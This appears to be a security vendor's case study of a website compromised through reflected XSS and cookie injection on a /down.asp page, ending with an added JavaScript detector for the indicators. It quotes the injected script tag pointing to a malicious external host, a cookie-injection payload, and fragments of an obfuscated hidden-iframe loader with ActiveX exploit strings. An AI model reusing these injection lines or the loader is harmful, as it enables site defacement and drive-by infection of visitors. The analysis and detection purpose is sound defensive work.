One day, Mr. Ren, a website maintainer, opened the homepage of the website as usual and clicked a link to verify that the site could be accessed normally. Unexpectedly, this triggered an alert from the anti-virus software: "malware discovered". To his surprise, almost all the links on the home page had been modified to include a strange address, "http://c.nuclear3.com/css/c.js", and it was this JS script that triggered the anti-virus alarm.
In desperation, Mr. Ren thought of Starling, his company's network security equipment provider, and immediately contacted the company's local staff. He also provided them with the website's log files.
Attackers
Soon, Mr. Ren received feedback from Starling engineers: the website's /down.asp page has a reflected XSS vulnerability. Attackers exploited this vulnerability and used cookie injection to insert the malicious script
<script src=http://c.nu%63%6Cear3.com/css/c.js></script>
into every link on the website, with the aim of harming its users.
· Tips: What is reflected XSS?
When a web application uses a server-side script to generate pages for users, and unvalidated user data is included in the page without HTML entity encoding, client-side code can be injected into the dynamic page.
In this example, the attackers embed a malicious script in a URL. Once a visitor clicks the link, the browser treats the malicious code as coming from the website itself and executes it as if it were safe.
· Tips: Cookie injection
Cookie injection is a form of SQL injection attack. The application uses request("name") directly to obtain the data submitted by the client and does not filter the submitted variables, and the anti-injection routine places no restriction on request.cookie.
A typical example is:
javascript:alert(document.cookie="id="+escape("XX and <attack string>"))
Cutting off the injection attackers
With the root cause understood, what remained was defense. With the assistance of Starling engineers, and using anxing's remote website security inspection service, Mr. Ren cleared the Trojans planted on the pages one by one and found several SQL injection and XSS vulnerabilities on the website. Because the website's original security check code cannot perform restoration at the semantic level (①), these two types of attack could not be completely eliminated by it. This can only be solved by deploying dedicated security products.
After comparing several domestic and foreign Web security defense products, the website finally chose the tianqing intrusion defense product, which uses attack management analysis to precisely block Web threats such as SQL injection and XSS attacks. Compared with traditional Web security built on data feature matching and exception models, it has a lower false negative rate and a lower false positive rate. After tianqing's intrusion protection product was deployed, Mr. Ren tried to repeat the attack through the earlier injection vulnerability and found that the product's event monitoring platform immediately raised an alarm and blocked the attempt. When the anxing inspection service was run again, no vulnerabilities were detected.
Note ①: Take the /css/c.js Trojan again as an example. The injected reference points to http://c.nuclear3.com/css/c.js, but this .js script is not really the attack code, only verification code:
document.write("<iframe src=http://fvgit.cn/01/index.htm width=100 height=0></iframe>");
This script file references a harmful link in a hidden frame:
var ll = new ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");}
Rrooxx = "I"+"E"+"R"+"P"+"C"+"t"+"l"+".I"+"ERP"+"Ctl.1";
Detecting this kind of substitution and evasion requires semantic restoration. If only keywords are checked, such attacks cannot be detected or blocked.
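The difference between keyword checking and semantic restoration described in the note, as an added example that is not part of the original article or of any vendor's product: it undoes percent-encoding and folds concatenated string literals before matching. The indicator list and all function names are assumptions made for this illustration.

```javascript
// Added example: "semantic restoration" before keyword matching.
// Indicator strings are taken from this article; function names are hypothetical.
const INDICATORS = [
  "c.nuclear3.com",
  "snpvw.snapshot viewer control.1",
  "ierpctl.ierpctl.1",
];

// Undo %XX escapes; repeat a few times so double encoding is also undone.
// Bytes are mapped one-to-one, which is enough for ASCII indicators.
function percentDecode(text) {
  let out = text;
  for (let i = 0; i < 3; i++) {
    const next = out.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
      String.fromCharCode(parseInt(hex, 16)));
    if (next === out) break;
    out = next;
  }
  return out;
}

// Fold adjacent string literals joined by "+" into one literal.
const CONCAT = /(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3/;
function foldConcats(text) {
  let out = text;
  for (let i = 0; i < 1000 && CONCAT.test(out); i++) {
    out = out.replace(CONCAT, (_, q, a, _q2, b) => q + a + b + q);
  }
  return out;
}

function matchIndicators(text) {
  const lower = text.toLowerCase();
  return INDICATORS.filter((ind) => lower.includes(ind));
}

// Compare plain keyword matching with matching on the restored text.
function scan(text) {
  const restored = foldConcats(percentDecode(text));
  return { naive: matchIndicators(text), restored: matchIndicators(restored) };
}

// Constructed samples, reusing the snippets quoted in the article.
const SAMPLES = [
  '<script src=http://c.nu%63%6Cear3.com/css/c.js></script>',
  'var ll = new ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");',
  'Rrooxx = "I"+"E"+"R"+"P"+"C"+"t"+"l"+".I"+"ERP"+"Ctl.1";',
];
for (const s of SAMPLES) console.log(scan(s));
```

For each sample the naive list is empty while the restored list names the indicator, which is the gap the note attributes to keyword-only checks.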